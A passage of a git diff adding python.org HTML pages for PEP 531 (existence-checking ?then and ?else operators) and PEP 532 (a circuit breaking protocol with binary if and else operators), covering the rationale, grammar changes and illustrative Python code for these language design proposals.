The mathematical symbol for existence assertions is U+2203 ‘THERE EXISTS’: ∃

+

Accordingly, one possible approach to the syntactic additions proposed in this +PEP would be to use that already defined mathematical notation:

+
    +
  • expr1 ∃then expr2
  • +
  • expr1 ∃else expr2
  • +
  • obj∃.attr
  • +
  • obj∃[expr]
  • +
  • target ∃= expr
  • +
+

However, there are two major problems with that approach, one practical, and +one pedagogical.

+

The practical problem is the usual one that most keyboards don’t offer any easy +way of entering mathematical symbols other than those used in basic arithmetic +(even the symbols appearing in this PEP were ultimately copied & pasted +from [3] rather than being entered directly).

+

The pedagogical problem is that the symbols for existence assertions (∃) and universal assertions (∀) aren’t going to be familiar to most people the way basic arithmetic operators are, so we wouldn’t actually be making the proposed syntax easier to understand by adopting ∃.

+

By contrast, ? is one of the few remaining unused ASCII punctuation +characters in Python’s syntax, making it available as a candidate syntactic +marker for “this control flow operation is based on an existence check, not a +truth check”.

+

Taking that path would also have the advantage of aligning Python’s syntax +with corresponding syntax in other languages that offer similar features.

+

Drawing from the existing summary in PEP 505 and the Wikipedia articles on +the “safe navigation operator [1] and the “null coalescing operator” [2], +we see:

+
    +
  • The ?. existence checking attribute access syntax precisely aligns with:
      +
    • the “safe navigation” attribute access operator in C# (?.)
    • +
    • the “optional chaining” operator in Swift (?.)
    • +
    • the “safe navigation” attribute access operator in Groovy (?.)
    • +
    • the “conditional member access” operator in Dart (?.)
    • +
    +
  • +
  • The ?[] existence checking subscript syntax precisely aligns with:
      +
    • the “safe navigation” subscript operator in C# (?[])
    • +
    • the “optional subscript” operator in Swift (?[])
    • +
    +
  • +
  • The ?else existence checking fallback syntax semantically aligns with:
      +
    • the “null-coalescing” operator in C# (??)
    • +
    • the “null-coalescing” operator in PHP (??)
    • +
    • the “nil-coalescing” operator in Swift (??)
    • +
    +
  • +
+

To be clear, these aren’t the only spellings of these operators used in other languages, but they’re the most common ones, and the ? symbol is the most common syntactic marker by far (presumably prompted by the use of ? to introduce the “then” clause in C-style conditional expressions, which many of these languages also offer).

+
+
+

Proposed keywords

+

Given the symbolic marker ?, it would be syntactically unambiguous to spell +the existence checking precondition and fallback operations using the same +keywords as their truth checking counterparts:

+
    +
  • expr1 ?and expr2 (instead of expr1 ?then expr2)
  • +
  • expr1 ?or expr2 (instead of expr1 ?else expr2)
  • +
+

However, while syntactically unambiguous when written, this approach makes +the code incredibly hard to pronounce (What’s the pronunciation of “?”?) and +also hard to describe (given reused keywords, there’s no obvious shorthand +terms for “existence checking precondition (?and)” and “existence checking +fallback (?or)” that would distinguish them from “logical conjunction (and)” +and “logical disjunction (or)”).

+

We could try to encourage folks to pronounce the ? symbol as “exists”, +making the shorthand names the “exists-and expression” and the +“exists-or expression”, but there’d be no way of guessing those names purely +from seeing them written in a piece of code.

+

Instead, this PEP takes advantage of the proposed symbolic syntax to introduce +a new keyword (?then) and borrow an existing one (?else) in a way +that allows people to refer to “then expressions” and “else expressions” +without ambiguity.

+

These keywords also align well with the conditional expressions that are +semantically equivalent to the proposed expressions.

+

For ?else expressions, expr1 ?else expr2 is equivalent to:

+
_lhs_result = expr1
+_lhs_result if operator.exists(_lhs_result) else expr2
+
+
+

Here the parallel is clear, since the else expr2 appears at the end of +both the abbreviated and expanded forms.

+

For ?then expressions, expr1 ?then expr2 is equivalent to:

+
_lhs_result = expr1
+expr2 if operator.exists(_lhs_result) else _lhs_result
+
+
+

Here the parallel isn’t as immediately obvious due to Python’s traditionally +anonymous “then” clauses (introduced by : in if statements and suffixed +by if in conditional expressions), but it’s still reasonably clear as long +as you’re already familiar with the “if-then-else” explanation of conditional +control flow.
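Since ?then and ?else were never implemented, the closest executable rendering today is a pair of helper functions (hypothetical names, again reusing the exists() sketch; callables defer evaluation of the right operand, mirroring short-circuiting):
def exists_else(lhs, rhs_factory):
+    # Emulates "lhs ?else rhs"; rhs_factory defers evaluating rhs.
+    return lhs if exists(lhs) else rhs_factory()
+
+def exists_then(lhs, rhs_func):
+    # Emulates "lhs ?then rhs_func(lhs)".
+    return rhs_func(lhs) if exists(lhs) else lhs
+
+print(exists_else(None, lambda: "default"))  # default
+print(exists_else(0, lambda: "default"))     # 0 (zero still "exists")
+print(exists_then(None, lambda v: v + 1))    # None (short-circuits)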

+
+
+
+

Risks and concerns

+
+

Readability

+

Learning to read and write the new syntax effectively mainly requires +internalising two concepts:

+
    +
  • expressions containing ? include an existence check and may short circuit
  • +
  • if None or another “non-existent” value is an expected input, and the +correct handling is to propagate that to the result, then the existence +checking operators are likely what you want
  • +
+

Currently, these concepts aren’t explicitly represented at the language level, +so it’s a matter of learning to recognise and use the various idiomatic +patterns based on conditional expressions and statements.

+
+
+

Magic syntax

+

There’s nothing about ? as a syntactic element that inherently suggests +is not None or operator.exists. The main current use of ? as a +symbol in Python code is as a trailing suffix in IPython environments to +request help information for the result of the preceding expression.

+

However, the notion of existence checking really does benefit from a pervasive +visual marker that distinguishes it from truth checking, and that calls for +a single-character symbolic syntax if we’re going to do it at all.

+
+
+

Conceptual complexity

+

This proposal takes the currently ad hoc and informal concept of “existence +checking” and elevates it to the status of being a syntactic language feature +with a clearly defined operator protocol.

+

In many ways, this should actually reduce the overall conceptual complexity +of the language, as many more expectations will map correctly between truth +checking with bool(expr) and existence checking with +operator.exists(expr) than currently map between truth checking and +existence checking with expr is not None (or expr is not NotImplemented +in the context of operand coercion, or the various NaN-checking operations +in mathematical libraries).

+

As a simple example of the new parallels introduced by this PEP, compare:

+
all_are_true = all(map(bool, iterable))
+at_least_one_is_true = any(map(bool, iterable))
+all_exist = all(map(operator.exists, iterable))
+at_least_one_exists = any(map(operator.exists, iterable))
+
+
+
+
+
+

Design Discussion

+
+

Subtleties in chaining existence checking expressions

+

Similar subtleties arise in chaining existence checking expressions as already +exist in chaining logical operators: the behaviour can be surprising if the +right hand side of one of the expressions in the chain itself returns a +value that doesn’t exist.

+

As a result, value = arg1 ?then f(arg1) ?else default() would be dubious for +essentially the same reason that value = cond and expr1 or expr2 is dubious: +the former will evaluate default() if f(arg1) returns None, just +as the latter will evaluate expr2 if expr1 evaluates to False in +a boolean context.

+
+
+

Ambiguous interaction with conditional expressions

+

In the proposal as currently written, the following is a syntax error:

+
    +
  • value = f(arg) if arg ?else default
  • +
+

While the following is a valid operation that checks a second condition if the +first doesn’t exist rather than merely being false:

+
    +
  • value = expr1 if cond1 ?else cond2 else expr2
  • +
+

The expression chaining problem described above means that the argument can be +made that the first operation should instead be equivalent to:

+
    +
  • value = f(arg) if operator.exists(arg) else default
  • +
+

requiring the second to be written in the arguably clearer form:

+
    +
  • value = expr1 if (cond1 ?else cond2) else expr2
  • +
+

Alternatively, the first form could remain a syntax error, and the existence +checking symbol could instead be attached to the if keyword:

+
    +
  • value = expr1 if? cond else expr2
  • +
+
+
+

Existence checking in other truth-checking contexts

+

The truth-checking protocol is currently used in the following syntactic +constructs:

+
    +
  • logical conjunction (and-expressions)
  • +
  • logical disjunction (or-expressions)
  • +
  • conditional expressions (if-else expressions)
  • +
  • if statements
  • +
  • while loops
  • +
  • filter clauses in comprehensions and generator expressions
  • +
+

In the current PEP, switching from truth-checking with and and or to +existence-checking is a matter of substituting in the new keywords, ?then +and ?else in the appropriate places.

+

For other truth-checking contexts, it proposes either importing and +using the operator.exists API, or else continuing with the current idiom +of checking specifically for expr is not None (or the context appropriate +equivalent).

+

The simplest possible enhancement in that regard would be to elevate the +proposed exists() API from an operator module function to a new builtin +function.

+

Alternatively, the ? existence checking symbol could be supported as a +modifier on the if and while keywords to indicate the use of an +existence check rather than a truth check.

+

However, it isn’t at all clear that the potential consistency benefits gained +for either suggestion would justify the additional disruption, so they’ve +currently been omitted from the proposal.

+
+
+

Defining expected invariant relations between __bool__ and __exists__

+

The PEP currently leaves the definition of __bool__ on all existing types +unmodified, which ensures the entire proposal remains backwards compatible, +but results in the following cases where bool(obj) returns True, but +the proposed operator.exists(obj) would return False:

+
    +
  • NaN values for float, complex, and decimal.Decimal
  • +
  • Ellipsis
  • +
  • NotImplemented
  • +
+

The main argument for potentially changing these is that it becomes easier to +reason about potential code behaviour if we have a recommended invariant in +place saying that values which indicate they don’t exist in an existence +checking context should also report themselves as being False in a truth +checking context.

+

Failing to define such an invariant would lead to arguably odd outcomes like +float("NaN") ?else 0.0 returning 0.0 while float("NaN") or 0.0 +returns NaN.

+
+
+
+

Limitations

+
+

Arbitrary sentinel objects

+

This proposal doesn’t attempt to provide syntactic support for the “sentinel +object” idiom, where None is a permitted explicit value, so a +separate sentinel object is defined to indicate missing values:

+
_SENTINEL = object()
+def f(obj=_SENTINEL):
+    return obj if obj is not _SENTINEL else default_value()
+
+
+

This could potentially be supported at the expense of making the existence +protocol definition significantly more complex, both to define and to use:

+
    +
  • at the Python layer, operator.exists and __exists__ implementations +would return the empty tuple to indicate non-existence, and otherwise return +a singleton tuple containing a reference to the object to be used as the +result of the existence check
  • +
  • at the C layer, tp_exists implementations would return NULL to indicate +non-existence, and otherwise return a PyObject * pointer as the +result of the existence check
  • +
+

Given that change, the sentinel object idiom could be rewritten as:

+
class Maybe:
+    SENTINEL = object()
+    def __init__(self, value):
+        self._result = (value,) if value is not self.SENTINEL else ()
+    def __exists__(self):
+        return self._result
+
+def f(obj=Maybe.SENTINEL):
+    return Maybe(obj) ?else default_value()
+
+
+

However, I don’t think cases where the 3 proposed standard sentinel values (i.e. +None, Ellipsis and NotImplemented) can’t be used are going to be +anywhere near common enough for the additional protocol complexity and the loss +of symmetry between __bool__ and __exists__ to be worth it.

+
+
+
+

Specification

+

The Abstract already gives the gist of the proposal and the Rationale gives +some specific examples. If there’s enough interest in the basic idea, then a +full specification will need to provide a precise correspondence between the +proposed syntactic sugar and the underlying conditional expressions that is +sufficient to guide the creation of a reference implementation.

+

…TBD…

+
+
+

Implementation

+

As with PEP 505, actual implementation has been deferred pending in-principle +interest in the idea of adding these operators - the implementation isn’t +the hard part of these proposals, the hard part is deciding whether or not +this is a change where the long term benefits for new and existing Python users +outweigh the short term costs involved in the wider ecosystem (including +developers of other implementations, language curriculum developers, and +authors of other Python related educational material) adjusting to the change.

+

…TBD…

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0531.rst

+

Last modified: 2023-10-11 12:05:51 GMT

+ +
+ +
+ \ No newline at end of file
diff --git a/pep-0532/index.html b/pep-0532/index.html new file mode 100644 index 00000000000..84dd5674bb4 --- /dev/null +++ b/pep-0532/index.html @@ -0,0 +1,1000 @@
+ PEP 532 – A circuit breaking protocol and binary operators | peps.python.org
+
+


+ + +
+
+
+

PEP 532 – A circuit breaking protocol and binary operators

+
+
Author:
+
Alyssa Coghlan <ncoghlan at gmail.com>, +Mark E. Haase <mehaase at gmail.com>
+
Status:
+
Deferred
+
Type:
+
Standards Track
+
Created:
+
30-Oct-2016
+
Python-Version:
+
3.8
+
Post-History:
+
05-Nov-2016
+
+
+
+
+
+

PEP Deferral

+

Further consideration of this PEP has been deferred until Python 3.8 at the +earliest.

+
+
+

Abstract

+

Inspired by PEP 335, PEP 505, PEP 531, and the related discussions, this PEP +proposes the definition of a new circuit breaking protocol (using the +method names __then__ and __else__) that provides a common underlying +semantic foundation for:

+
    +
  • conditional expressions: LHS if COND else RHS
  • +
  • logical conjunction: LHS and RHS
  • +
  • logical disjunction: LHS or RHS
  • +
  • the None-aware operators proposed in PEP 505
  • +
  • the rich comparison chaining model proposed in PEP 535
  • +
+

Taking advantage of the new protocol, it further proposes that the definition +of conditional expressions be revised to also permit the use of if and +else respectively as right-associative and left-associative general +purpose short-circuiting operators:

+
    +
  • Right-associative short-circuiting: LHS if RHS
  • +
  • Left-associative short-circuiting: LHS else RHS
  • +
+

In order to make logical inversion (not EXPR) consistent with the above +changes, it also proposes the introduction of a new logical inversion protocol +(using the method name __not__).

+

To force short-circuiting of a circuit breaker without having to evaluate +the expression creating it twice, a new operator.short_circuit(obj) +helper function will be added to the operator module.

+

Finally, a new standard types.CircuitBreaker type is proposed to decouple +an object’s truth value (as used to determine control flow) from the value +it returns from short-circuited circuit breaking expressions, with the +following factory functions added to the operator module to represent +particularly common switching idioms:

+
    +
  • switching on bool(obj): operator.true(obj)
  • +
  • switching on not bool(obj): operator.false(obj)
  • +
  • switching on obj is value: operator.is_sentinel(obj, value)
  • +
  • switching on obj is not value: operator.is_not_sentinel(obj, value)
  • +
+
+
+

Relationship with other PEPs

+

This PEP builds on an extended history of work in other proposals. Some of +the key proposals are discussed below.

+
+

PEP 531: Existence checking protocol

+

This PEP is a direct successor to PEP 531, replacing the existence checking +protocol and the new ?then and ?else syntactic operators defined there +with the new circuit breaking protocol and adjustments to conditional +expressions and the not operator.

+
+
+

PEP 505: None-aware operators

+

This PEP complements the None-aware operator proposals in PEP 505, by offering +an underlying protocol-driven semantic framework that explains their +short-circuiting behaviour as highly optimised syntactic sugar for particular +uses of conditional expressions.

+

Given the changes proposed by this PEP:

+
    +
  • LHS ?? RHS would roughly be is_not_sentinel(LHS, None) else RHS
  • +
  • EXPR?.attr would roughly be EXPR.attr if is_not_sentinel(EXPR, None)
  • +
  • EXPR?[key] would roughly be EXPR[key] if is_not_sentinel(EXPR, None)
  • +
+

In all three cases, the dedicated syntactic form would be optimised to avoid +actually creating the circuit breaker instance and instead implement the +underlying control flow directly. In the latter two cases, the syntactic form +would also avoid evaluating EXPR twice.

+

This means that while the None-aware operators would remain highly specialised +and specific to None, other sentinel values would still be usable through the +more general protocol-driven proposal in this PEP.

+
+
+

PEP 335: Overloadable Boolean operators

+

PEP 335 proposed the ability to overload the short-circuiting and and +or operators directly, with the ability to overload the semantics of +comparison chaining being one of the consequences of that change. The +proposal in an earlier version of this PEP to instead handle the element-wise +comparison use case by changing the semantic definition of comparison chaining +is drawn directly from Guido’s rejection of PEP 335 [1].

+

However, initial feedback on this PEP indicated that the number of different +proposals that it covered made it difficult to read, so that part of the +proposal has been separated out as PEP 535.

+
+
+

PEP 535: Rich comparison chaining

+

As noted above, PEP 535 is a proposal to build on the circuit breaking protocol +defined in this PEP in order to expand the rich comparison support introduced +in PEP 207 to also handle comparison chaining operations like +LEFT_BOUND < VALUE < RIGHT_BOUND.

+
+
+
+

Specification

+
+

The circuit breaking protocol (if-else)

+

Conditional expressions (LHS if COND else RHS) are currently interpreted +as an expression level equivalent to:

+
if COND:
+    _expr_result = LHS
+else:
+    _expr_result = RHS
+
+
+

This PEP proposes changing that expansion to allow the checked condition to +implement a new “circuit breaking” protocol that allows it to see, and +potentially alter, the result of either or both branches of the expression:

+
_cb = COND
+_type_cb = type(_cb)
+if _cb:
+    _expr_result = LHS
+    if hasattr(_type_cb, "__then__"):
+        _expr_result = _type_cb.__then__(_cb, _expr_result)
+else:
+    _expr_result = RHS
+    if hasattr(_type_cb, "__else__"):
+        _expr_result = _type_cb.__else__(_cb, _expr_result)
+
+
+

As shown, interpreter implementations would be required to access only the +protocol method needed for the branch of the conditional expression that is +actually executed. Consistent with other protocol methods, the special methods +would be looked up via the circuit breaker’s type, rather than directly on the +instance.
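The expansion above can be sketched as an ordinary function in current Python (cond_expr is a hypothetical helper, not part of the proposal; zero-argument callables stand in for the lazily evaluated branches):
def cond_expr(cond, then_factory, else_factory):
+    # Emulates "THEN if COND else ELSE" under the proposed protocol;
+    # only the selected branch factory is called, mirroring the
+    # short-circuiting of real conditional expressions.
+    cb_type = type(cond)
+    if cond:
+        result = then_factory()
+        hook = getattr(cb_type, "__then__", None)
+    else:
+        result = else_factory()
+        hook = getattr(cb_type, "__else__", None)
+    if hook is not None:
+        result = hook(cond, result)
+    return result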

+
+
+

Circuit breaking operators (binary if and binary else)

+

The proposed name of the protocol doesn’t come from the proposed changes to +the semantics of conditional expressions. Rather, it comes from the proposed +addition of if and else as general purpose protocol driven +short-circuiting operators to complement the existing True and False +based short-circuiting operators (or and and, respectively) as well +as the None based short-circuiting operator proposed in PEP 505 (??).

+

Together, these two operators would be known as the circuit breaking operators.

+

In order to support this usage, the definition of conditional expressions in +the language grammar would be updated to make both the if clause and +the else clause optional:

+
test: else_test ['if' or_test ['else' test]] | lambdef
+else_test: or_test ['else' test]
+
+
+

Note that we would need to avoid the apparent simplification to +else_test ('if' else_test)* in order to make it easier for compiler +implementations to correctly preserve the semantics of normal conditional +expressions.

+

The definition of the test_nocond node in the grammar (which deliberately +excludes conditional expressions) would remain unchanged, so the circuit +breaking operators would require parentheses when used in the if +clause of comprehensions and generator expressions just as conditional +expressions themselves do.

+

This grammar definition means precedence/associativity in the otherwise ambiguous case of expr1 if cond else expr2 else expr3 resolves as (expr1 if cond else expr2) else expr3. However, a guideline will also be added to PEP 8 to say “don’t do that”, as such a construct will be inherently confusing for readers, regardless of how the interpreter executes it.

+

The right-associative circuit breaking operator (LHS if RHS) would then +be expanded as follows:

+
_cb = RHS
+_expr_result = LHS if _cb else _cb
+
+
+

While the left-associative circuit breaking operator (LHS else RHS) would +be expanded as:

+
_cb = LHS
+_expr_result = _cb if _cb else RHS
+
+
+

The key point to note in both cases is that when the circuit breaking +expression short-circuits, the condition expression is used as the result of +the expression unless the condition is a circuit breaker. In the latter +case, the appropriate circuit breaker protocol method is called as usual, but +the circuit breaker itself is supplied as the method argument.

+

This allows circuit breakers to reliably detect short-circuiting by checking +for cases when the argument passed in as the candidate expression result is +self.

+
+
+

Overloading logical inversion (not)

+

Any circuit breaker definition will have a logical inverse that is still a +circuit breaker, but inverts the answer as to when to short circuit the +expression evaluation. For example, the operator.true and +operator.false circuit breakers proposed in this PEP are each other’s +logical inverse.

+

A new protocol method, __not__(self), will be introduced to permit circuit +breakers and other types to override not expressions to return their +logical inverse rather than a coerced boolean result.

+

To preserve the semantics of existing language optimisations (such as +eliminating double negations directly in a boolean context as redundant), +__not__ implementations will be required to respect the following +invariant:

+
assert not bool(obj) == bool(not obj)
+
+
+

However, symmetric circuit breakers (those that implement all of __bool__, +__not__, __then__ and __else__) would only be expected to respect +the full semantics of boolean logic when all circuit breakers involved in the +expression are using a consistent definition of “truth”. This is covered +further in Respecting De Morgan’s Laws.

+
+
+

Forcing short-circuiting behaviour

+

Invocation of a circuit breaker’s short-circuiting behaviour can be forced by +using it as all three operands in a conditional expression:

+
obj if obj else obj
+
+
+

Or, equivalently, as both operands in a circuit breaking expression:

+
obj if obj
+obj else obj
+
+
+

Rather than requiring the use of any of these patterns, this PEP proposes to add a dedicated function to the operator module to explicitly short-circuit a circuit breaker, while passing other objects through unmodified:

+
+def short_circuit(obj):
+    """Replace circuit breakers with their short-circuited result
+
+    Passes other input values through unmodified.
+    """
+    return obj if obj else obj
+
+
+
+
+

Circuit breaking identity comparisons (is and is not)

+

In the absence of any standard circuit breakers, the proposed if and +else operators would largely just be unusual spellings of the existing +and and or logical operators.

+

However, this PEP further proposes to provide a new general purpose +types.CircuitBreaker type that implements the appropriate short +circuiting logic, as well as factory functions in the operator module +that correspond to the is and is not operators.

+

These would be defined in such a way that the following expressions produce +VALUE rather than False when the conditional check fails:

+
EXPR if is_sentinel(VALUE, SENTINEL)
+EXPR if is_not_sentinel(VALUE, SENTINEL)
+
+
+

And similarly, these would produce VALUE rather than True when the +conditional check succeeds:

+
is_sentinel(VALUE, SENTINEL) else EXPR
+is_not_sentinel(VALUE, SENTINEL) else EXPR
+
+
+

In effect, these comparisons would be defined such that the leading +VALUE if and trailing else VALUE clauses can be omitted as implied in +expressions of the following forms:

+
# To handle "if" expressions, " else VALUE" is implied when omitted
+EXPR if is_sentinel(VALUE, SENTINEL) else VALUE
+EXPR if is_not_sentinel(VALUE, SENTINEL) else VALUE
+# To handle "else" expressions, "VALUE if " is implied when omitted
+VALUE if is_sentinel(VALUE, SENTINEL) else EXPR
+VALUE if is_not_sentinel(VALUE, SENTINEL) else EXPR
+
+
+

The proposed types.CircuitBreaker type would represent this behaviour +programmatically as follows:

+
class CircuitBreaker:
+    """Simple circuit breaker type"""
+    def __init__(self, value, bool_value):
+        self.value = value
+        self.bool_value = bool(bool_value)
+    def __bool__(self):
+        return self.bool_value
+    def __not__(self):
+        return CircuitBreaker(self.value, not self.bool_value)
+    def __then__(self, result):
+        if result is self:
+            return self.value
+        return result
+    def __else__(self, result):
+        if result is self:
+            return self.value
+        return result
+
+
+

The key characteristic of these circuit breakers is that they are ephemeral: +when they are told that short circuiting has taken place (by receiving a +reference to themselves as the candidate expression result), they return the +original value, rather than the circuit breaking wrapper.

+

The short-circuiting detection is defined such that the wrapper will always +be removed if you explicitly pass the same circuit breaker instance to both +sides of a circuit breaking operator or use one as all three operands in a +conditional expression:

+
breaker = types.CircuitBreaker(foo, foo is None)
+assert operator.short_circuit(breaker) is foo
+assert (breaker if breaker) is foo
+assert (breaker else breaker) is foo
+assert (breaker if breaker else breaker) is foo
+breaker = types.CircuitBreaker(foo, foo is not None)
+assert operator.short_circuit(breaker) is foo
+assert (breaker if breaker) is foo
+assert (breaker else breaker) is foo
+assert (breaker if breaker else breaker) is foo
+
+
+

The factory functions in the operator module would then make it +straightforward to create circuit breakers that correspond to identity +checks using the is and is not operators:

+
def is_sentinel(value, sentinel):
+    """Returns a circuit breaker switching on 'value is sentinel'"""
+    return types.CircuitBreaker(value, value is sentinel)
+
+def is_not_sentinel(value, sentinel):
+    """Returns a circuit breaker switching on 'value is not sentinel'"""
+    return types.CircuitBreaker(value, value is not sentinel)
+
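Putting the pieces together in today’s Python (a hypothetical demo: the CircuitBreaker class shown above stands in for the proposed types.CircuitBreaker, and the cond_expr() sketch from the Specification section stands in for the missing binary else operator):
def is_not_sentinel(value, sentinel):
+    # Local stand-in for the proposed operator.is_not_sentinel factory.
+    return CircuitBreaker(value, value is not sentinel)
+
+data = {"key": 42}
+
+# Emulating: is_not_sentinel(data.get("key"), None) else "default"
+breaker = is_not_sentinel(data.get("key"), None)
+print(cond_expr(breaker, lambda: breaker, lambda: "default"))  # 42
+
+breaker = is_not_sentinel(data.get("missing"), None)
+print(cond_expr(breaker, lambda: breaker, lambda: "default"))  # default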
+
+
+
+

Truth checking comparisons

+

Due to their short-circuiting nature, the runtime logic underlying the and +and or operators has never previously been accessible through the +operator or types modules.

+

The introduction of circuit breaking operators and circuit breakers allows +that logic to be captured in the operator module as follows:

+
def true(value):
+    """Returns a circuit breaker switching on 'bool(value)'"""
+    return types.CircuitBreaker(value, bool(value))
+
+def false(value):
+    """Returns a circuit breaker switching on 'not bool(value)'"""
+    return types.CircuitBreaker(value, not bool(value))
+
+
+
    +
  • LHS or RHS would be effectively true(LHS) else RHS
  • +
  • LHS and RHS would be effectively false(LHS) else RHS
  • +
+

No actual change would take place in these operator definitions, the new +circuit breaking protocol and operators would just provide a way to make the +control flow logic programmable, rather than hardcoding the sense of the check +at development time.

+

Respecting the rules of boolean logic, these expressions could also be +expanded in their inverted form by using the right-associative circuit +breaking operator instead:

+
    +
  • LHS or RHS would be effectively RHS if false(LHS)
  • +
  • LHS and RHS would be effectively RHS if true(LHS)
  • +
+
+
+

None-aware operators

+

If both this PEP and PEP 505’s None-aware operators were accepted, then the +proposed is_sentinel and is_not_sentinel circuit breaker factories +would be used to encapsulate the notion of “None checking”: seeing if a value +is None and either falling back to an alternative value (an operation known +as “None-coalescing”) or passing it through as the result of the overall +expression (an operation known as “None-severing” or “None-propagating”).

+

Given these circuit breakers, LHS ?? RHS would be roughly equivalent to +both of the following:

+
    +
  • is_not_sentinel(LHS, None) else RHS
  • +
  • RHS if is_sentinel(LHS, None)
  • +
+

Due to the way they inject control flow into attribute lookup and subscripting +operations, None-aware attribute access and None-aware subscripting can’t be +expressed directly in terms of the circuit breaking operators, but they can +still be defined in terms of the underlying circuit breaking protocol.

+

In those terms, EXPR?.ATTR[KEY].SUBATTR() would be semantically +equivalent to:

+
_lookup_base = EXPR
+_circuit_breaker = is_not_sentinel(_lookup_base, None)
+_expr_result = _lookup_base.ATTR[KEY].SUBATTR() if _circuit_breaker
+
+
+

Similarly, EXPR?[KEY].ATTR.SUBATTR() would be semantically equivalent +to:

+
_lookup_base = EXPR
+_circuit_breaker = is_not_sentinel(_lookup_base, None)
+_expr_result = _lookup_base[KEY].ATTR.SUBATTR() if _circuit_breaker
+
+
+

The actual implementations of the None-aware operators would presumably be +optimised to skip actually creating the circuit breaker instance, but the +above expansions would still provide an accurate description of the observable +behaviour of the operators at runtime.
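For example, the None-coalescing behaviour of LHS ?? RHS could be emulated today with a hypothetical helper built on the earlier sketches:
def none_coalesce(lhs, rhs_factory):
+    # Emulates the proposed "LHS ?? RHS": lhs is returned unless it
+    # is None, in which case rhs_factory() supplies the fallback.
+    breaker = is_not_sentinel(lhs, None)
+    return cond_expr(breaker, lambda: breaker, rhs_factory)
+
+print(none_coalesce(0, lambda: 42))     # 0 (only None triggers the fallback)
+print(none_coalesce(None, lambda: 42))  # 42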

+
+
+

Rich chained comparisons

+

Refer to PEP 535 for a detailed discussion of this possible use case.

+
+
+

Other conditional constructs

+

No changes are proposed to if statements, while statements, comprehensions, +or generator expressions, as the boolean clauses they contain are used +entirely for control flow purposes and never return a result as such.

+

However, it’s worth noting that while such proposals are outside the scope of +this PEP, the circuit breaking protocol defined here would already be +sufficient to support constructs like:

+
def is_not_none(obj):
+    return is_sentinel(obj, None)
+
+while is_not_none(dynamic_query()) as result:
+    ... # Code using result
+
+
+

and:

+
if is_not_none(re.search(pattern, text)) as match:
+    ... # Code using match
+
+
+

This could be done by assigning the result of +operator.short_circuit(CONDITION) to the name given in the as clause, +rather than assigning CONDITION to the given name directly.

+
+
+

Style guide recommendations

+

The following additions to PEP 8 are proposed in relation to the new features +introduced by this PEP:

+
    +
  • Avoid combining conditional expressions (if-else) and the standalone +circuit breaking operators (if and else) in a single expression - +use one or the other depending on the situation, but not both.
  • +
  • Avoid using conditional expressions (if-else) and the standalone +circuit breaking operators (if and else) as part of if +conditions in if statements and the filter clauses of comprehensions +and generator expressions.
  • +
+
+
+
+

Rationale

+
+

Adding new operators

+

Similar to PEP 335, early drafts of this PEP focused on making the existing +and and or operators less rigid in their interpretation, rather than +proposing new operators. However, this proved to be problematic for a few key +reasons:

+
    +
  • the and and or operators have a long established and stable meaning, +so readers would inevitably be surprised if their meaning now became +dependent on the type of the left operand. Even new users would be confused +by this change due to 25+ years of teaching material that assumes the +current well-known semantics for these operators
  • +
  • Python interpreter implementations, including CPython, have taken advantage +of the existing semantics of and and or when defining runtime and +compile time optimisations, which would all need to be reviewed and +potentially discarded if the semantics of those operations changed
  • +
  • it isn’t clear what names would be appropriate for the new methods needed +to define the protocol
  • +
+

Proposing short-circuiting binary variants of the existing if-else ternary +operator instead resolves all of those issues:

+
    +
  • the runtime semantics of and and or remain entirely unchanged
  • +
  • while the semantics of the unary not operator do change, the invariant +required of __not__ implementations means that existing expression +optimisations in boolean contexts will remain valid.
  • +
  • __else__ is the short-circuiting outcome for if expressions due to +the absence of a trailing else clause
  • +
  • __then__ is the short-circuiting outcome for else expressions due to +the absence of a leading if clause (this connection would be even clearer +if the method name was __if__, but that would be ambiguous given the +other uses of the if keyword that won’t invoke the circuit breaking +protocol)
  • +
+
+
+

Naming the operator and protocol

+

The names “circuit breaking operator”, “circuit breaking protocol” and +“circuit breaker” are all inspired by the phrase “short circuiting operator”: +the general language design term for operators that only conditionally +evaluate their right operand.

+

The electrical analogy is that circuit breakers in Python detect and handle +short circuits in expressions before they trigger any exceptions similar to the +way that circuit breakers detect and handle short circuits in electrical +systems before they damage any equipment or harm any humans.

+

The Python level analogy is that just as a break statement lets you +terminate a loop before it reaches its natural conclusion, a circuit breaking +expression lets you terminate evaluation of the expression and produce a result +immediately.

+
+
+

Using existing keywords

+

Using existing keywords has the benefit of allowing the new operators to +be introduced without a __future__ statement.

+

if and else are semantically appropriate for the proposed new protocol, +and the only additional syntactic ambiguity introduced arises when the new +operators are combined with the explicit if-else conditional expression +syntax.

+

The PEP handles that ambiguity by explicitly specifying how it should be handled by interpreter implementers, while proposing to point out in PEP 8 that even though interpreters will understand it, human readers probably won’t, and hence it won’t be a good idea to use both conditional expressions and the circuit breaking operators in a single expression.

+
+
+

Naming the protocol methods

+

Naming the __else__ method was straightforward, as reusing the operator +keyword name results in a special method name that is both obvious and +unambiguous.

+

Naming the __then__ method was less straightforward, as there was another +possible option in using the keyword-based name __if__.

+

The problem with __if__ is that there would continue to be many cases where the if keyword appeared, with an expression to its immediate right, but the __if__ special method would not be invoked. Instead, the bool() builtin and its underlying special methods (__bool__, __len__) would be invoked, while __if__ would have no effect.

+

With the boolean protocol already playing a part in conditional expressions and +the new circuit breaking protocol, the less ambiguous name __then__ was +chosen based on the terminology commonly used in computer science and +programming language design to describe the first clause of an if +statement.

+
+
+

Making binary if right-associative

+

The precedent set by conditional expressions means that a binary +short-circuiting if expression must necessarily have the condition on the +right as a matter of consistency.

+

With the right operand always being evaluated first, and the left operand not +being evaluated at all if the right operand is true in a boolean context, +the natural outcome is a right-associative operator.

+
+
+

Naming the standard circuit breakers

+

When used solely with the left-associative circuit breaking operator, +explicit circuit breaker names for unary checks read well if they start with +the preposition if_:

+
operator.if_true(LHS) else RHS
+operator.if_false(LHS) else RHS
+
+
+

However, incorporating the if_ doesn’t read as well when performing +logical inversion:

+
not operator.if_true(LHS) else RHS
+not operator.if_false(LHS) else RHS
+
+
+

Or when using the right-associative circuit breaking operator:

+
LHS if operator.if_true(RHS)
+LHS if operator.if_false(RHS)
+
+
+

Or when naming a binary comparison operation:

+
operator.if_is_sentinel(VALUE, SENTINEL) else EXPR
+operator.if_is_not_sentinel(VALUE, SENTINEL) else EXPR
+
+
+

By contrast, omitting the preposition from the circuit breaker name gives a +result that reads reasonably well in all forms for unary checks:

+
operator.true(LHS) else RHS       # Preceding "LHS if " implied
+operator.false(LHS) else RHS      # Preceding "LHS if " implied
+not operator.true(LHS) else RHS   # Preceding "LHS if " implied
